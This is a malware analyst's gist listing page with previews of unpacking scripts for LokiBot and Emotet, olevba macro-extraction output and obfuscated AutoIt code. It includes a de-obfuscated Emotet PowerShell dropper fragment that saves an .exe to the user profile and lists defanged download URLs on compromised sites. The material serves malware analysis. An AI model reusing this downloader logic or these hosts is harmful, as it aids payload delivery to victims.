Irshad Muhammad irshadqemu
irshadqemu
/ unpack_3rdstage_lokibot.py
Created
January 4, 2021 10:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| from itertools import cycle | |
| SERVER_RESPONSE_FIE = "server_response.txt" | |
| XOR_KEY = b"ZKkz8PH0" | |
| with open(SERVER_RESPONSE_FIE) as serverfd: | |
| resp_str = serverfd.read() | |
| resp_str = resp_str[::-1] |
irshadqemu
/ de-obfuscated-ps.ps1
Created
November 22, 2020 20:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $jrFhA0='Wf1rHz' | |
| $uUMMLI = '284' | |
| $iBtj49N='ThMqW8s0' | |
| $FwcAJs6=$env:userprofile+'\'+$uUMMLI+'.exe' | |
| $S9GzRstM='EFCwnlGz' | |
| $u8UAr3=&('new-object') NeT.wEBClIEnt | |
| $pLjBqINE='http[:]//blockchainjoblist[.]com/wp-admin/014080/ | |
| @ https[:]//womenempowermentpakistan[.]com/wp-admin/paba5q52/ | |
| @ https[:]//atnimanvilla[.]com/wp-content/073735/ | |
| @ https[:]//yeuquynhnhai[.]com/upload/41830/ |
irshadqemu
/ unpack_emotet.py
Last active
January 8, 2021 16:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Name: | |
| # unpack_emotet.py | |
| # Description: | |
| # This script accompanies my blog at | |
| # https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/ | |
| # and can be used to statically unpack given sample in the blog | |
| # Author: | |
| # https://twitter.com/mirshadx | |
| # https://www.linkedin.com/in/irshad-muhammad-3020b0a5/ |
irshadqemu
/ emotet.vbs
Created
November 15, 2020 20:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: emotet.doc | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls | |
| in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- |
irshadqemu
/ charge_07.20.vbs
Created
November 15, 2020 14:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ olevba.exe charge_07.20.doc | |
| olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: charge_07.20.doc | |
| Type: OpenXML | |
| Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'. | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls | |
| in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - |
irshadqemu
/ file.au3
Created
February 5, 2020 14:40
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 29$A3560804E16 = A2B00000233($OS[1]), $A4B60A04F1C = A2B00000233($OS[2]), $A3A60C03143 = A2B00000233($OS[3]), $A3360E01054 = A2B00000233($OS[4]), $A1070005C36 = A2B00000233($OS[5]), $A2C70204F5F = A2B00000233($OS[6]), $A5A7040361D = A2B00000233($OS[7]), $A5870605460 = A2B00000233($OS[8]), $A567080112D = A2B00000233($OS[9]), $A5670D0410E = A2B00000233($OS[10]), $A5E80205900 = A2B00000233($OS[11]), $A4580403500 = A2B00000233($OS[12]), $A5D80603E25 = A2B00000233($OS[13]), $A3580801732 = A2B00000233($OS[14]), $A5480A0022D = A2B00000233($OS[15]), $A2F80C00D40 = A2B00000233($OS[16]), $A2580E03701 = A2B00000233($OS[17]), $A639000454B = A2B00000233($OS[18]), $A0E90203930 = A2B00000233($OS[19]), $A5990405F41 = A2B00000233($OS[20]), $A0C9060335F = A2B00000233($OS[21]), $A079080083C = A2B00000233($OS[22]), $A3690A02A2A = A2B00000233($OS[23]), $A5890C04F61 = A2B00000233($OS[24]), $A1590E03C19 = A2B00000233($OS[25]), $A54A0002952 = A2B00000233($OS[26]), $A07A0201025 = A2B00000233($OS[27]), $A2DA0400532 = A2B00000233($OS[2 |
irshadqemu
/ a.ipynb
Last active
January 8, 2021 16:38
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
irshadqemu
/ Data download
Last active
January 10, 2018 18:51
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kg download -u <username> -p <password> -c planet-understanding-the-amazon-from-space |